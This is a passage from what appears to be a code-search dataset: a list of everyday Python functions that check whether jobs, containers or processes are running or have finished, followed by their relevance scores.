is_geth_running(self) -> bool:\r\n command = 'docker exec -t %s geth attach ipc://root/abc/geth.ipc --exec \"admin.nodeInfo\"' % self.name\r\n result = self.ip.exec_command(command)\r\n return False if 
result.split(':')[0] == 'Fatal' else True", "def can_run_job(self, rj_params: RunJobParams) -> Squonk2AgentRv:\n assert rj_params\n assert isinstance(rj_params, RunJobParams)\n\n if _TEST_MODE:\n msg: str = 'Squonk2Agent is in TEST mode'\n _LOGGER.warning(msg)\n\n # Protect against lack of config or connection/setup issues...\n if not self.ping():\n msg = 'Squonk2 ping failed.'\\\n ' Are we configured properly and is Squonk2 alive?'\n _LOGGER.error(msg)\n return Squonk2AgentRv(success=False, msg=msg)\n\n return self._verify_access(c_params=rj_params.common)", "def check_status(job):\n client = get_dropbox_client()\n\n try:\n return client.metadata(\n '/Video Automation Platform/jobs/{job}/{job}.png'.format(job=job))\n\n except ErrorResponse:\n return False", "def _doWork(self) -> bool:\n # grab a job from queur\n self.lock.acquire ()\n jobId = self.nextJob\n self.nextJob = jobId + 1\n self.lock.release ()\n\n # abort if no jobs are left\n if jobId >= len (self.jobs):\n return False\n\n # execute job\n job = self.jobs[jobId]\n lc = job[\"description\"]\n if self.progressCallback != None:\n self.lock.acquire ()\n self.progressCallback (lc, self.executedJobs, len (self.jobs))\n self.lock.release ()\n else:\n print (lc + \" (\" + str (jobId) + \" / \" + str (len (self.jobs)) + \")\\n\")\n if job[\"runner\"] (job) == False:\n return False\n self.executedJobs = self.executedJobs + 1\n\n # continue on jobs\n return True", "def job_has_params(job_url):\n name = job_url.rstrip(\"/\").rsplit(\"/\")[-1]\n if name in (\n \"pr-docs\",\n \"pr-lint\",\n \"pr-pre-commit\",\n ):\n return False\n else:\n return True", "def test_wrong_job(self):\n job = MockJob()\n container_name = 'container_identifier'\n self._mock_open.return_value.__enter__.return_value.readline. 
\\\n return_value = container_name\n\n # return an error trying to read file with container name\n self._mock_open.return_value.__enter__.side_effect = [\n PermissionError,\n FileNotFoundError,\n ]\n\n self.assertNotEqual(job.pid, 0)\n # non-zero pid, no container name is found -> refer to ForkSpawner\n validation_result = self._container_spawner.validate(job)\n self._mock_open.assert_called()\n self._mock_fork.assert_called()\n self.assertEqual(validation_result,\n spawner.PROCESS_RUNNING)\n # same check, a different exception\n self.assertEqual(self._container_spawner.validate(job),\n spawner.PROCESS_RUNNING)", "async def is_running(self, **kwargs: Any) -> bool:\n return True", "def checkUpstreamScheduler():", "async def is_running(self, **kwargs: Any) -> bool:\n ...", "def running(self) -> bool:", "def _check_job_completeness(self, jobs):\n for job in concurrent.futures.as_completed(jobs):\n if job.exception():\n raise (job.exception())", "def is_job_running(self, condor_id):\n\n classads = self.get_classads(\"OSGRSVUniqueName==\\\"%s\\\"\" % condor_id)\n\n if classads is None:\n self.rsv.log(\"ERROR\", \"Could not determine if job is running\")\n return False\n\n for classad in classads:\n # We put the attribute into the classad in quotes, so search for it accordingly\n if classad[\"OSGRSVUniqueName\"] == '\"' + condor_id + '\"':\n return True\n\n return False", "def check_job_exists( job_list, analysis_group_id, reprocess_config_id):\n for job in job_list:\n struct = JSONMessage.unserialize(job.input_message)\n\n if( int( struct.analysis_group_id ) == int( analysis_group_id ) and \\\n int( struct.reprocess_config_id ) == int( reprocess_config_id ) ):\n return 1\n return 0", "def check(self):\n if self.backend.poll():\n raise RuntimeError('Backend process died.')\n\n if self.esp.poll():\n raise RuntimeError('ESP process died.')", "def can_use_mpi_pool():\n return ALLOW_SPAWN or ALREADY_RUNNING_AS_MPI", "def check_input_file(self):\n\n # Mission critical parameters\n if self.jobname is None:\n sys.exit('Batch_emto.check_input_file: \\'jobname\\' has to be given!')\n\n if self.runtime is None:\n self.runtime = \"48:00:00\"\n if self.emtopath is None:\n self.emtopath = \"./\"\n if self.EMTOdir is None:\n self.EMTOdir = \"$HOME/EMTO5.8/\"\n if self.runKGRN is None:\n self.runKGRN = True\n if self.runKFCD is None:\n self.runKFCD = True\n return", "def jobHealthy(self, count):\n job = self.tester.submission_result.job\n for idx in range(count - 1):\n if (job.health == 'healthy'):\n return True\n print(\"health check fail : %d\" % idx )\n time.sleep(1)\n job.refresh()\n self.assertEqual('healthy', job.health)\n return False", "def test_ready_only_job_pass(self):\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_pass\"\n name = \"TestReadOnlyPass\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted", "def _can_run(self, plugin: T_Plugin) -> bool:\n now = int(time.time())\n minimum_run_interval = get_plugin_config_option(\n plugin.ID, \"minimum_run_interval\", \"int\", fallback=None\n )\n\n if not 
minimum_run_interval:\n # Minimum run interval not specified for this plugin\n return True\n\n previous_run_time = self._plugin_run_times.get(plugin.ID, None)\n\n if previous_run_time and previous_run_time + minimum_run_interval > now:\n grace_time_seconds = abs(now - (previous_run_time + minimum_run_interval))\n LOG.info(\n \"Plugin was executed less than %s seconds ago, refusing execution. Plugin can run \"\n \"again in %s seconds.\" % (minimum_run_interval, grace_time_seconds)\n )\n return False\n\n return True", "def _detect(self):\n if monasca_setup.detection.find_process_cmdline('rabbitmq-server') is not None:\n self.available = True", "def is_running(self):\n status = self.get_status_response()\n return ((status[1] & 2) == 2)\n #end is_running()", "def runnable(self):\n if \"calculations\" not in self.ctx:\n return True # if no calculations have run\n return self.ctx.running_calc < 2 and self.can_restart()", "def is_available_while_running(cls) -> bool:\n\n return True", "def _job_succeeded(k8s_ctx: str, k8s_job_file: pathlib.Path, dry_run: bool = False) -> bool:\n if not k8s_job_file.exists():\n raise FileNotFoundError(str(k8s_job_file))\n\n cmd = f'kubectl --context={k8s_ctx} get -f {k8s_job_file} -o json'\n\n if dry_run:\n logging.info(cmd)\n return True\n\n p = safe_exec(cmd)\n if not p.stdout:\n return False\n\n retval = 0\n if not p.stdout:\n return False\n\n json_output = json.loads(p.stdout.decode())\n if 'status' not in json_output:\n return False\n\n final_status = ''\n if 'conditions' in json_output['status'] and len(json_output['status']['conditions']) > 0:\n final_status = json_output['status']['conditions'][0]['type']\n\n if final_status == 'Complete' and 'succeeded' in json_output['status']:\n retval = json_output['status']['succeeded']\n elif final_status == 'Failed' and 'failed' in json_output['status']:\n n = int(json_output['status']['failed'])\n logging.error(f'Job {k8s_job_file} failed {n} time(s)')\n # EB-1236, EB-1243: This exception is not caught anywhere - either catch it in caller,\n # or throw UserReportError instead\n raise RuntimeError(f'Job {k8s_job_file} failed {n} time(s)')\n return int(retval) == 1", "def test_job_exists():\n with tempfile.TemporaryDirectory() as STATUS_DIR:\n Status.add_job(STATUS_DIR, 'generation', 'test1',\n job_attrs={'job_status': 'submitted'})\n exists = Status.job_exists(STATUS_DIR, 'test1')\n assert exists", "def check_n_jobs(n_jobs, allow_cuda=False):\n if not isinstance(n_jobs, int):\n if not allow_cuda:\n raise ValueError('n_jobs must be an integer')\n elif not isinstance(n_jobs, string_types) or n_jobs != 'cuda':\n raise ValueError('n_jobs must be an integer, or \"cuda\"')\n # else, we have n_jobs='cuda' and this is okay, so do nothing\n elif _force_serial:\n n_jobs = 1\n logger.info('... MNE_FORCE_SERIAL set. Processing in forced '\n 'serial mode.')\n elif n_jobs <= 0:\n try:\n import multiprocessing\n n_cores = multiprocessing.cpu_count()\n n_jobs = min(n_cores + n_jobs + 1, n_cores)\n if n_jobs <= 0:\n raise ValueError('If n_jobs has a negative value it must not '\n 'be less than the number of CPUs present. '\n 'You\\'ve got %s CPUs' % n_cores)\n except ImportError:\n # only warn if they tried to use something other than 1 job\n if n_jobs != 1:\n warn('multiprocessing not installed. 
Cannot run in parallel.')\n n_jobs = 1\n\n return n_jobs", "def has_pending_jobs(instance_properties, max_size):\n try:\n max_cluster_slots = max_size * instance_properties.get(\"slots\")\n pending_jobs = get_pending_jobs_info(max_slots_filter=max_cluster_slots, skip_if_state=SGE_HOLD_STATE)\n logging.info(\"Found the following pending jobs:\\n%s\", pending_jobs)\n return len(pending_jobs) > 0, False\n except Exception as e:\n log.error(\"Failed when checking for pending jobs with exception %s. Reporting no pending jobs.\", e)\n return False, True", "def checkjob(sid, jid):\n with slycat.web.server.remote.get_session(sid) as session:\n return session.checkjob(jid)", "def _check_before_run(self):\n if not osp.exists(self.dataset_dir):\n raise RuntimeError(\"'{}' is not available\".format(self.dataset_dir))", "def check(self):\n with working_dir(self.build_directory):\n self._if_ninja_target_execute(\"test\", parallel=False)", "def checkStatus(self,runlog=None,proc=None):\n if runlog is None:\n raise Exception(\"Cannot checkStatus without runlog\")\n \n # If it's a \"help\" or \"usage\" run, just use the parent checkStatus\n for option in SBATCH_NOSUBMIT_OPTIONS:\n if \"--%s\" % option in runlog[\"cmdstring\"]:\n return super(self.__class__,self).checkStatus(runlog,proc)\n \n result = self.getSlurmStatus(runlog[\"jobid\"]) \n if result in [\"CANCELLED\",\"COMPLETED\",\"FAILED\",\"TIMEOUT\",\"NODE_FAIL\",\"SPECIAL_EXIT\"]:\n return result\n else:\n return None", "def _wait_until_job_starts_on_cluster(self) -> Optional[float]:\n status = None\n job_checking_retry_cnt = 0\n while job_checking_retry_cnt < MAX_JOB_CHECKING_RETRY:\n # Avoid the infinite loop, if any bug happens.\n job_checking_retry_cnt += 1\n try:\n cluster_status, _ = (\n backend_utils.refresh_cluster_status_handle(\n self.cluster_name,\n force_refresh_statuses=set(status_lib.ClusterStatus)))\n except Exception as e: # pylint: disable=broad-except\n # If any unexpected error happens, retry the job checking\n # loop.\n # TODO(zhwu): log the unexpected error to usage collection\n # for future debugging.\n logger.info(f'Unexpected exception: {e}\\nFailed to get the '\n 'refresh the cluster status. Retrying.')\n continue\n if cluster_status != status_lib.ClusterStatus.UP:\n # The cluster can be preempted before the job is\n # launched.\n # Break to let the retry launch kick in.\n logger.info('The cluster is preempted before the job '\n 'is submitted.')\n # TODO(zhwu): we should recover the preemption with the\n # recovery strategy instead of the current while loop.\n break\n\n try:\n status = spot_utils.get_job_status(self.backend,\n self.cluster_name)\n except Exception as e: # pylint: disable=broad-except\n # If any unexpected error happens, retry the job checking\n # loop.\n # Note: the CommandError is already handled in the\n # get_job_status, so it should not happen here.\n # TODO(zhwu): log the unexpected error to usage collection\n # for future debugging.\n logger.info(f'Unexpected exception: {e}\\nFailed to get the '\n 'job status. 
Retrying.')\n continue\n\n # Check the job status until it is not in initialized status\n if status is not None and status > job_lib.JobStatus.INIT:\n try:\n job_submitted_at = spot_utils.get_job_timestamp(\n self.backend, self.cluster_name, get_end_time=False)\n return job_submitted_at\n except Exception as e: # pylint: disable=broad-except\n # If we failed to get the job timestamp, we will retry\n # job checking loop.\n logger.info(f'Unexpected Exception: {e}\\nFailed to get '\n 'the job start timestamp. Retrying.')\n continue\n # Wait for the job to be started\n time.sleep(spot_utils.JOB_STARTED_STATUS_CHECK_GAP_SECONDS)\n return None", "def check_job(self, a_thread, _):\n if not a_thread.isAlive():\n self.close_button.disabled = False\n self.popup_label.text = \"Process finished. Processed records:\" + str(self.count_funct())\n return False", "def __verify__(cls):\n\n try:\n UpstartSystem()\n return True\n except Exception as e:\n try:\n UpstartSystem(bus=DirectUpstartBus())\n return True\n except Exception as e:\n return False", "def launch_submission(self):\n if self.status == \"running\":\n raise RuntimeError(\"Cannot launch submission: one is already \" \"started\")\n if self.status == \"error\":\n raise RuntimeError(\"Cannot launch submission: the setup failed\")\n try:\n exit_status = aws.launch_train(\n self.config, self.instance.id, self.submission\n )\n except Exception as e:\n logger.error(f\"Unknown error occurred: {e}\")\n exit_status = 1\n\n if exit_status != 0:\n logger.error(\n 'Cannot start training of submission \"{}\"'\n \", an error occured.\".format(self.submission)\n )\n self.status = \"error\"\n else:\n self.status = \"running\"\n return exit_status", "def detect_launch_failure(self):\n\n # Check if the local proc has faulted (poll() will return non-None with a non-zero return\n # code in such cases). If a fault was encountered, raise server error (500) with a message\n # indicating to check the EG log for more information.\n if self.local_proc:\n poll_result = self.local_proc.poll()\n if poll_result and poll_result > 0:\n self.local_proc.wait() # FIXME\n error_message = f\"Error occurred during launch of KernelID: {self.kernel_id}. \" \\\n \"Check Enterprise Gateway log for more information.\"\n self.local_proc = None\n self.log_and_raise(RuntimeError(error_message))", "def check_status(self):", "def check_job_status(job):\n assert isinstance(job, PreprocessJob),\\\n 'job must be a PreprocessJob'\n\n if job.is_finished():\n return True\n\n return True\n \"\"\"\n ye_task = AsyncResult(job.task_id,\n app=preprocess_csv_file)\n\n if ye_task.state == 'SUCCESS':\n\n if ye_task.result['success']:\n\n preprocess_data = ContentFile(json.dumps(ye_task.result['data']))\n\n new_name = 'preprocess_%s.json' % get_alphanumeric_lowercase(8)\n job.metadata_file.save(new_name,\n preprocess_data)\n job.set_state_success()\n\n job.user_message = 'Task completed! 
Preprocess is available'\n job.save()\n\n else:\n # Didn't work so well\n job.set_state_failure(ye_task.result['message'])\n job.save()\n\n ye_task.forget()\n return True\n\n elif ye_task.state == STATE_FAILURE:\n job.set_state_failure('ye_task failed....')\n job.save()\n ye_task.forget()\n return True\n\n return False\n \"\"\"", "def available(self):\n\t\treturn self.executable(self.path[0]) and \\\n\t\t\tself.executable(self.path[1])", "def _engineServicesRunning():\n process = subprocess.Popen([\"ps\", \"aux\"], stdout=subprocess.PIPE)\n\n stdout = process.communicate()[0]\n result = process.returncode\n if result != 0:\n raise RuntimeError(\"Unable to check for running client job manager\")\n\n # See if the CJM is running\n running = False\n for line in stdout.split(\"\\n\"):\n if \"python\" in line and \"clientjobmanager.client_job_manager\" in line:\n running = True\n break\n\n return running", "def _check_job_status(self) -> str:\n self._assert_job_created()\n\n r = requests.post(\n f'https://{cc.ROUTE_PREFIX}.stratodem.com/jobs/status',\n headers=dict(\n Authorization=f'Bearer {get_api_token()}',\n ),\n json=dict(job_id=self._job_id)\n )\n\n if not r.status_code == 200:\n raise APIQueryFailedException('Failed to determine job status')\n\n r = r.json()\n\n if not r['success']:\n raise APIQueryFailedException(r)\n else:\n return r['message']" ]
[ "0.6642071", "0.66208327", "0.66090924", "0.6534082", "0.6497826", "0.64233065", "0.63549906", "0.6345807", "0.63409173", "0.6323821", "0.63086534", "0.6279424", "0.62567234", "0.62546295", "0.62468517", "0.621095", "0.619517", "0.61762893", "0.6153152", "0.61371064", "0.613373", "0.6101392", "0.609395", "0.60809827", "0.6071481", "0.6046405", "0.60424685", "0.60254186", "0.60223997", "0.6017434", "0.6015161", "0.60146326", "0.6008374", "0.5990759", "0.5989855", "0.596941", "0.5956311", "0.5953527", "0.5950813", "0.5944364", "0.59205323", "0.59176594", "0.59104425", "0.5906326", "0.5870849", "0.58704287", "0.5868258", "0.5848584", "0.58481014", "0.58195066", "0.5809312", "0.5804852", "0.5798318", "0.57956207", "0.57926893", "0.57859516", "0.57856715", "0.5782677", "0.5768665", "0.57617164", "0.57611567", "0.57598096", "0.5759005", "0.57577956", "0.57576555", "0.57561576", "0.5748987", "0.5743777", "0.57278967", "0.5722878", "0.5720903", "0.571799", "0.57172835", "0.5716864", "0.5711732", "0.5706825", "0.57065296", "0.5704081", "0.57029915", "0.5684197", "0.5680857", "0.56806165", "0.56776845", "0.56775045", "0.56770235", "0.56727946", "0.5664774", "0.5647755", "0.5630956", "0.56299675", "0.5627826", "0.561833", "0.5610905", "0.5605133", "0.5600467", "0.5599851", "0.55983055", "0.55959225", "0.5588566", "0.5580554" ]
0.66355747
1
Return Q(s,a) based on current Q
>>> q = TabularQ([0,1,2,3],['b','c'])
>>> q.set(0, 'b', 5)
>>> q.set(0, 'c', 10)
>>> q_star = value(q,0)
>>> q_star
10
def value(q, s):
    # Your code here
    return max(q.get(s, a) for a in q.actions)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _getq(self, q=None):\n if q is None:\n return self.q\n elif isvector(q, self.n):\n return getvector(q, self.n)\n else:\n return getmatrix(q, (None, self.n))", "def calc_q_values(self, state):\n return self.q_values_func([state])[0]", "def getQValue(self, state, action):\n \"\"\"Description:\n return the q-value for current state & action\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n return self.qValues[(state, action)]\n \"\"\" END CODE \"\"\"", "def q(self, s, a):\n # The Q value of the current state is based on the max Q value of the next state.\n next_state_max_q = max([self.qtable[s[0]+x][s[1]+y] for (x,y) in self.maze.moves()])\n self.qtable[s[0]+a[0]][s[1]+a[1]] = (self.qtable[s[0]+a[0]][s[1]+a[1]]\n + self.alpha * (self.r(s,a) + self.gamma * next_state_max_q\n - self.qtable[s[0]+a[0]][s[1]+a[1]]))\n\n return self.qtable[s[0]+a[0]][s[1]+a[1]]", "def get_q_values(self, state):\n raise NotImplemented", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n Q_Value = self.Q\n\n if (state,action) not in Q_Value: #Checks if state is present in dictionary or not, basically if we have ever seen a state or not\n\n Q_Value[(state,action)]= 0.0 #Put value as zero because we have not seen the state as if now\n\n\n return Q_Value[(state,action)] #Returns Q node value\n #util.raiseNotDefined()", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n return self.qValues[(state, action)]", "def scalar_q(q_1: Q) -> Q:\n\n end_q_type = f\"scalar_q({q_1.q_type})\"\n s = Q([q_1.t, 0, 0, 0], q_type=end_q_type, representation=q_1.representation)\n return s", "def getqvalue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n if (state, action) not in self.qvals:\n self.qvals[(state, action)] = 0.0\n return self.qvals[(state, action)]", "def __float__(self):\n return self.q[0]", "def scalar(self):\n return self.q[0]", "def getQValue(self, state, action):\n position = self.computePosition(state)\n action_column = self.columAction[action]\n\n return self.q_table[position][action_column]", "def get_q(self, board_hash):\n if board_hash in self.q:\n qvals = self.q[board_hash]\n else:\n qvals = [0] + [self.q_init_val for i in range(1,10)]\n self.q[board_hash] = qvals\n \n return qvals", "def get_Q_value(self, state, action):\n return self.Q.get((state, action), 0.0) # Return 0.0 if state-action pair does not exist", "def initial_Q(self, negative):\n \n ##get each values in the Q, and change their content to given number, plan to use in Q5\n for key in self.Q.iterkeys():\n self.Q[key] = float(negative)", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n # print \"GETQVALUE in QLEARNINGAGENT, QVALUE: \",self.Q[(state, action)]\n\n return self.Q[(state, action)]\n\n\n util.raiseNotDefined()", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n return self.qValues[(state, action)]", "def qgset(x):\n return 0.2855*x - 0.8565", "def q(self):\n return self._x", "def getQ(m, t):\n\n Q = []\n for r in range(len(t)):\n qrow = []\n for c in range(len(t)):\n qrow.append(m[t[r]][t[c]])\n Q.append(qrow) \n return Q", "def square(q_1: Q) -> Q:\n\n end_q_type = f\"{q_1.q_type}²\"\n\n qxq = _commuting_products(q_1, q_1)\n\n sq_q = Q(q_type=end_q_type, representation=q_1.representation)\n sq_q.t = qxq[\"tt\"] - qxq[\"xx+yy+zz\"]\n sq_q.x = qxq[\"tx+xt\"]\n sq_q.y = qxq[\"ty+yt\"]\n sq_q.z = qxq[\"tz+zt\"]\n\n return sq_q", "def updateQ_value(self, value):\n self.Q_value = (self.Q_value * self.nVisits + value) / (self.nVisits + 1)", "def qubit_values(self):\n return 
self.label", "def qs_to_q_function(func: FunctionType, q_1: Qs) -> Q:\n\n scalar = func(q_1)\n\n if scalar.qs_type != \"scalar_q\":\n raise Exception(f\"Oops, does not evaluate to a scalar: {scalar}\")\n\n return scalar.qs[0]", "def calcQ(self,thisObs,next_action,reward):\n \n thisObs_tup=(thisObs['volume'],thisObs['time'])\n lastAction_tup=(self.lastAction['vol'],self.lastAction['price'])\n lastObs_tup=(self.lastObs['volume'],self.lastObs['time'])\n lastQvalue=0\n maxQvalue=0\n temp_action=()\n \n if (len(self.Qvalue)>0): \n \"\"\"Searches the Q-value dictionary\"\"\"\n for key,value in self.Qvalue.iteritems():\n \n if (key[0][0]== thisObs_tup[0] and key[0][1]==thisObs_tup[1]):\n if (value > maxQvalue):\n maxQvalue=value\n temp_action = key[1]\n \n if (key[0][0]== lastObs_tup[0] and key[0][1]==lastObs_tup[1] and \n key[1][0]== lastAction_tup[0] and key[1][1]==lastAction_tup[1]):\n \n lastQvalue=self.Qvalue[key]\n #print(\"This state was already encoutered and updated\")\n \n self.Qvalue[(lastObs_tup,lastAction_tup)]=lastQvalue+alpha*(reward+(gamma*maxQvalue)-lastQvalue) \n #print 'The Qtable is',self.Qvalue\n if (len(temp_action)!=0):\n #print \"I found a greedy action\" \n next_action['vol'] = temp_action[0]\n next_action['price']=temp_action[1]\n else: \n next_action=self.return_random_action(thisObs)\n \n return next_action", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n return self.QValueCounter[(state, action)]", "def s(self, q):\n if isinstance(q, QuantumRegister):\n instructions = InstructionSet()\n for j in range(q.size):\n instructions.add(self.s((q, j)))\n return instructions\n\n self._check_qubit(q)\n return self._attach(SGate(q, self))", "def vvalue(self) -> Qval:\n return self.get(self.greedy())", "def convert_to_q(self):\n if self.measure == 'Q':\n warnings.warn('Parameters are already converted to Q!')\n else:\n kappa_sp = self.kappa_s\n kappa_yp = self.kappa_y\n self.kappa_s = self.kappa_s - self.lmbd_s * self.eta_s\n self.kappa_y = self.kappa_y - self.lmbd_y * self.eta_y\n self.scale = kappa_sp / self.kappa_s\n self.mean_v *= (kappa_yp / self.kappa_y * self.scale)\n self.lmbd = 0\n self.eta_y *= (self.scale**.5)\n self.measure = 'Q'\n self.update_ajd()", "def calc_q_values(self, state, Q, flag):\n\n if flag == 0:\n self.train_data = np.concatenate([st.state for st in state])\n return Q.predict_on_batch(self.train_data)\n elif flag == 1:\n return Q.predict_on_batch(np.concatenate([st.next_state for st in state]))", "def simple_q(self: Q) -> Q:\n\n self.t = sp.simplify(self.t)\n self.x = sp.simplify(self.x)\n self.y = sp.simplify(self.y)\n self.z = sp.simplify(self.z)\n return self", "def qalist(self):\n return self._palist.qalist", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n Q_Value = 0 #initializing q value\n\n feat_Extractor = self.featExtractor\n\n weight = self.weights #To get the weight to control exploration and exploitation\n\n features = feat_Extractor.getFeatures(state,action) #to get all the features associated with (state,action) pair\n\n for each_feature in features:\n #refer to README_Reinforcement.txt for the formula at line 11\n temp_Qvalue = weight[each_feature] * features[each_feature] #Q(state,action) = w * featureVector where * is the dotProduct operator\n Q_Value = Q_Value + temp_Qvalue\n\n return Q_Value #Returns final qvalue\n #util.raiseNotDefined()", "def qTable(self, expand=False, factor=False, simplify=False):\n self._compute_kreinParameters(expand=expand, factor=factor,\n simplify=simplify)\n 
self._.q.rewrite(expand=expand, factor=factor, simplify=simplify)\n return self._.q", "def getQValue(self, state, action):\n return self.qValues[(state, action)]", "def _update_q_value(self, start_state, to_state, reward, iteration):\n if start_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(start_state, self.qstore.q)\n if to_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(to_state, self.qstore.q)\n\n actions = self.qstore.q[start_state.as_tuple()]['actions']\n values = self.qstore.q[start_state.as_tuple()]['utilities']\n\n max_over_next_states = max(self.qstore.q[to_state.as_tuple()]['utilities']) if to_state.terminate != 1 else 0\n\n action_between_states = to_state.as_tuple()\n\n action_index = actions.index(action_between_states)\n learning_rate_alpha = 1 / (iteration ** self.state_space_parameters.learning_rate_omega)\n\n # Q_Learning update rule\n values[action_index] = ( # Q_t+1(s_i,𝑢) =\n values[action_index] + # Q_t(s_i,𝑢)\n learning_rate_alpha * ( # α\n reward # r_t\n + self.state_space_parameters.discount_factor # γ\n * max_over_next_states # max_{𝑢'∈ 𝒰(s_j)} Q_t(s_j,𝑢')\n - values[action_index] # -Q_t(s_i,𝑢)\n )\n )\n\n self.qstore.q[start_state.as_tuple()] = {'actions': actions, 'utilities': values}", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def set_qs_type(self: Qs, qs_type: str = \"\", rows: int = 0, columns: int = 0, copy: bool = True) -> Qs:\n\n # Checks.\n if rows and columns and rows * columns != self.dim:\n raise ValueError(\n f\"Oops, check those values again for rows:{rows} columns:{columns} dim:{self.dim}\"\n )\n\n new_q = self\n\n if copy:\n new_q = deepcopy(self)\n\n # Assign values if need be.\n if new_q.qs_type != qs_type:\n new_q.rows = 0\n\n if qs_type == \"ket\" and not new_q.rows:\n new_q.rows = new_q.dim\n new_q.columns = 1\n\n elif qs_type == \"bra\" and not new_q.rows:\n new_q.rows = 1\n new_q.columns = new_q.dim\n\n elif qs_type in [\"op\", \"operator\"] and not new_q.rows:\n # Square series\n root_dim = math.sqrt(new_q.dim)\n\n if root_dim.is_integer():\n new_q.rows = int(root_dim)\n new_q.columns = int(root_dim)\n qs_type = \"op\"\n\n elif rows * columns == new_q.dim and not new_q.qs_type:\n if new_q.dim == 1:\n qs_type = \"scalar_q\"\n elif new_q.rows == 1:\n qs_type = \"bra\"\n elif new_q.columns == 1:\n qs_type = \"ket\"\n else:\n qs_type = \"op\"\n\n if not qs_type:\n raise Exception(\n \"Oops, please set rows and columns for this quaternion series operator. 
Thanks.\"\n )\n\n if new_q.dim == 1:\n qs_type = \"scalar_q\"\n\n new_q.qs_type = qs_type\n\n return new_q", "def __int__(self):\n return int(self.q[0])", "def update_Q(self):", "def qUpdate(self,s,a,r,sPrime):\r\n #get max_a' Q(s',a')\r\n \"\"\"\r\n maxA = 0\r\n maxQ = float(\"-inf\")\r\n for aCurr in actions:\r\n qCurr = Q[(sPrime,aCurr)]\r\n if qCurr > maxQ:\r\n maxA = aCurr\r\n maxQ = qCurr\r\n \"\"\"\r\n maxQ = self.maxQ(sPrime)[0]\r\n #update Q and return it\r\n self.Q[(s,a)] = (1 - self.alpha) * self.Q[(s,a)] + self.alpha * (r + self.gamma * maxQ)", "def _get_qvalues(self, state_t):\n qvalues = self.network(state_t)\n return qvalues", "def parse_qpf(q):\n if q == \"M\":\n value = \"NULL\"\n trace = \"0\"\n elif q == \"T\":\n value = \"0.00\"\n trace = \"1\"\n else:\n value = q\n trace = \"0\"\n\n return quote(value), quote(trace)", "def q1(self):\n import numpy as np\n dipole = self.get('q1') # they are (so far) always given in AU\n if dipole is not None:\n dipole = np.array([dipole[2], dipole[0], dipole[1]])\n return dipole", "def get_q_values(self, state, network):\n out = None\n state = state.permute(0, 3, 1, 2)\n #pdb.set_trace()\n ##############################################################\n ################ YOUR CODE HERE - 4-5 lines lines ################\n if network == 'q_network':\n out = self.q_network(state)\n else:\n out = self.target_network(state)\n ##############################################################\n ######################## END YOUR CODE #######################\n return out", "def new_q_value(q_table: np.ndarray, old_state: int, action: int,\n learning_rate: float, current_reward: float,\n new_state: int, discount_rate :float) -> float:\n result = q_table[old_state, action]\n result += learning_rate * delta_q_value(q_table, action, current_reward,\n old_state, new_state,\n discount_rate)\n return result", "def Q(self, value):\n assert value > 0, \"Q needs to be positive and above zero (we divide by Q)\"\n self._Q = value\n self._update()", "def q(self):\n self.qTable()", "def xut2q( self, x , u , t ):\n \n # default is q = x\n \n return x", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n qvalue = 0\n features = self.featExtractor.getFeatures(state, action)\n #Each feature is in the form of dictionary {((3, 3), 'east'): 1.0}. Each key is a combination of coordinate and direction. 
Each value represents the old qvalue.\n for feature in features.keys():\n qvalue += features[feature] * self.weights[feature]\n return qvalue", "def update_Q(self, state, action, reward, new_state = None):\n Q_val = self.Q[state][action]\n \n # Look at the best action from the next state.\n Qp_val = 0\n if new_state is not None:\n Qp_val = max(self.Q[new_state].values())\n \n # The famous formula:\n Q_val = Q_val + self.alpha * (reward + self.gamma * Qp_val - Q_val)\n #print self.alpha\n #print state, 'action: ', action\n #print 'Q[%s]: %s' % (state, self.Q[state])\n #print 'Q val: ', Q_val\n \n self.Q[state][action] = Q_val\n \n return None", "def getQValue(self, state, action):\n return self.q.get((tuple(state), action), 0)", "def update_Q(self, state, action, reward, state_prime):\n # print \"Updating Q MATRIX\"\n\n # Q(s,a) = (1- alpha)*Q(s,a) + alpha*(reward + gamma * max_Q(s', a'))\n\n # Init value if it doesn't exist: Q(self.state, self.action) = 0\n if (state, action) not in self.Q:\n self.Q[(state, action)] = self.Q_default_value\n\n self.Q[(state, action)] = (1 - self.alpha) * self.Q[(state, action)] + \\\n self.alpha * (reward + self.gamma * self.max_Q_by_state(state_prime))", "def ea_from_q(p, q):\n return p * q / (0.622 + 0.378 * q)", "def f(self, (k,t), (J,q,dq), **params):\n f = 0.*q\n return f", "def enumerate_test_metric(\n self, qset: Iterator[Tuple[str, float]]\n ) -> Iterator[Tuple[CompletionElement, CompletionElement]]:\n qset = sorted(qset)\n current = 0\n for query, weight in qset:\n while current < len(self) and self[current].value <= query:\n current += 1\n ind = current - 1\n el = CompletionElement(query, weight)\n if ind >= 0:\n inset = self[ind]\n le = len(inset.value)\n if le <= len(query) and inset.value == 